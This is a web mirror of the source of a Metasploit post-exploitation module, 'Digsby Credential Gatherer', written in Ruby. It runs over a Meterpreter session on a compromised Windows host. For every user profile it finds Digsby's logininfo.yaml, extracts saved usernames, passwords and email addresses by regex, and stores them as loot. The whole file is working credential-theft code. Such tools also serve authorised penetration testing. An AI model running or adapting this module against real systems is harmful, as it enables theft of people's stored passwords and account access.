Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/windows/gather/credentials/digsby.rb
21552 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  include Msf::Post::File

8
  include Msf::Post::Windows::UserProfiles

9
  include Msf::Post::Windows::Packrat

10
  ARTIFACTS =

11
    {

12
      application: 'digsby',

13
      app_category: 'chats',

14
      gatherable_artifacts: [

15
        {

16
          filetypes: 'logins',

17
          path: 'LocalAppData',

18
          dir: 'Digsby',

19
          artifact_file_name: 'logininfo.yaml',

20
          description: "Digsby's saved Username &amp; Passwords",

21
          credential_type: 'text',

22
          regex_search: [

23
            {

24
              extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',

25
              extraction_type: 'credentials',

26
              regex: [

27
                '(?i-mx:password.*)',

28
                '(?i-mx:username.*)'

29
              ]

30
            },

31
            {

32
              extraction_description: 'searches for Email TO/FROM address',

33
              extraction_type: 'Email addresses',

34
              regex: [

35
                '(?i-mx:to:.*)',

36
                '(?i-mx:from:.*)'

37
              ]

38
            }

39
          ]

40
        }

41
      ]

42
    }.freeze

43


44
  def initialize(info = {})

45
    super(

46
      update_info(

47
        info,

48
        'Name' => 'Digsby Credential Gatherer',

49
        'Description' => %q{

50
          This module searches for Digsby credentials on a Windows host.

51
        },

52
        'License' => MSF_LICENSE,

53
        'Author' => [

54
          'Kazuyoshi Maruta',

55
          'Daniel Hallsworth',

56
          'Barwar Salim M',

57
          'Z. Cliffe Schreuders' # http://z.cliffe.schreuders.org

58
        ],

59
        'Platform' => ['win'],

60
        'SessionTypes' => ['meterpreter'],

61
        'Notes' => {

62
          'Stability' => [CRASH_SAFE],

63
          'Reliability' => [],

64
          'SideEffects' => []

65
        }

66
      )

67
    )

68


69
    register_options(

70
      [

71
        OptRegexp.new('REGEX', [false, 'Match a regular expression', '^password']),

72
        OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),

73
        OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),

74
        # enumerates the options based on the artifacts that are defined below

75
        OptEnum.new('ARTIFACTS', [

76
          false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map do |k|

77
                                                          k[:filetypes]

78
                                                        end.uniq.unshift('All')

79
        ])

80
      ]

81
    )

82
  end

83


84
  def run

85
    print_status('Filtering based on these selections:  ')

86
    print_status("ARTIFACTS: #{datastore['ARTIFACTS'].capitalize}")

87
    print_status("STORE_LOOT: #{datastore['STORE_LOOT']}")

88
    print_status("EXTRACT_DATA: #{datastore['EXTRACT_DATA']}\n")

89


90
    # used to grab files for each user on the remote host

91
    grab_user_profiles.each do |userprofile|

92
      run_packrat(userprofile, ARTIFACTS)

93
    end

94


95
    print_status 'PackRat credential sweep completed'

96
  end

97
end

98


99